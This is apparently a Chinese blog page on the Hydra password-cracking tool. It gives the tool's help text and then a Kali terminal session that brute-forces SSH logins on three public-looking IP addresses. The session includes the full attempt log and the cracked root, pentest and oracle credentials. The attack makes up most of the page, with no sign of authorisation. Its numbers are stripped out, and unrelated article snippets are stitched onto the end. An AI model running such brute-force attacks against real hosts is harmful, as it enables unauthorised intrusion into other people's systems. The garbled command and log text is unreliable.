Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example: hydra -l user -P passlist.txt ftp://192.168.0.1


# 待破解的主机列表
root@kali:~# cat serverlist
189.37.178.1
189.37.178.216
189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c) by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have seconds to abort...
[DATA] max tasks per servers, overall tasks, login tries (l:/p:), ~ tries per task
[DATA] attacking service ssh on port
[VERBOSE] Resolving addresses ... done
[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22
[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22
[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22
[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[][ssh] host:189.37.178.98 login: root
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "root" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" - of [child ]
[][ssh] host:189.37.178.1 login: pentest password:
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" - of [child ]
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" - of [child ]
[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" - of [child ]
[][ssh] host:189.37.178.216 login: oracle password: oracle
[STATUS] attack finished for189.37.178. (waiting for children to complete tests)
of targets successfully completed, valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表

root@kali:~# cat output.txt
# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t -vV -o ./output.txt -e ns -M serverlist ssh)
[][ssh] host: 189.37.178.98 login: root
[][ssh] host: 189.37.178.1 login: pentest password:
[][ssh] host: 189.37.178.216 login: oracle password: oracle

安全工具-Hydra的更多相关文章

  1. 路由器密码破解工具 Hydra 7.5

    之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...

  2. Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用

    Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...

  3. 暴力破解工具hydra与Medusa

    ---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...

  4. (总结)Linux下的暴力密码在线破解工具Hydra详解

    (总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869

  5. 初试在线破解工具Hydra爆破3389服务器

    hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...

  6. Linux下暴力破解工具Hydra详解

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  7. [转]Linux下的暴力密码破解工具Hydra详解

    摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...

  8. linux下暴力破解工具hydra【转】

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  9. linux暴力密码破解工具hydra安装与使用

    说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...

  10. Kali中密码暴力破解工具hydra的使用

    前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...

随机推荐

  1. dns服务扩展

  2. vuex那些事儿

    vuex适用于大型单页应用.每一个Vuex应用的核心就是store(仓库),store中储存大量状态,Vuex的状态存储是响应式的.vuex使用单一状态树,一个对象包含了全部的应用层级状态,每个应用仅 ...

  3. 使用 universalimageloader 缓存图片的配置类及使用方法

    0.gradle 配置 dependencies { compile fileTree(dir: 'libs', include: ['*.jar']) testCompile 'junit:juni ...

  4. 实现左边div固定宽度,右边div自适应撑满剩下的宽度的布局方式:

    html: <div class="container"> <div class="left"> left固定宽度200px </ ...

  5. vs2010黑色主题Dark完美设置

    版权声明:本文为博主原创文章,未经博主允许不得转载.   ----------------------------------------------------------------------- ...

  6. BZOJ.5286.[AHOI/HNOI2018]转盘(线段树)

    BZOJ LOJ 洛谷 如果从\(1\)开始,把每个时间\(t_i\)减去\(i\),答案取决于\(\max\{t_i-i\}\).记取得最大值的位置是\(p\),答案是\(t_p+1+n-1-p=\ ...

  7. BZOJ.4897.[Thu Summer Camp2016]成绩单(区间DP)

    BZOJ 显然是个区间DP.令\(f[l][r]\)表示全部消掉区间\([l,r]\)的最小花费. 因为是可以通过删掉若干子串来删子序列的,所以并不好直接转移.而花费只与最大最小值有关,所以再令\(g ...

  8. CSS-三角形及其原理

    CSS中三角形在网页中比较常见,以前是图片,不过现在基本上都是通过CSS可以完成,实现比较简单,我们可以看一组简单的三角形效果: 其实实现起来比较简单,通过空div然后设置宽高为0,之后可以四周bor ...

  9. 移动端页面:viewport与分辨率的坑

    <meta name="viewport" content="width=device-width, user-scalable=no"> < ...

  10. JS 数组方法

    1.栈方法 ECMAScript 提供了一些让数组行为类似其他数据结构的方法 栈是一种后进先出(LIFO)的数据结构,也就是最新添加的项最早被移除:而栈中数据的添加和删除只发生在栈的顶部 数组可以对其 ...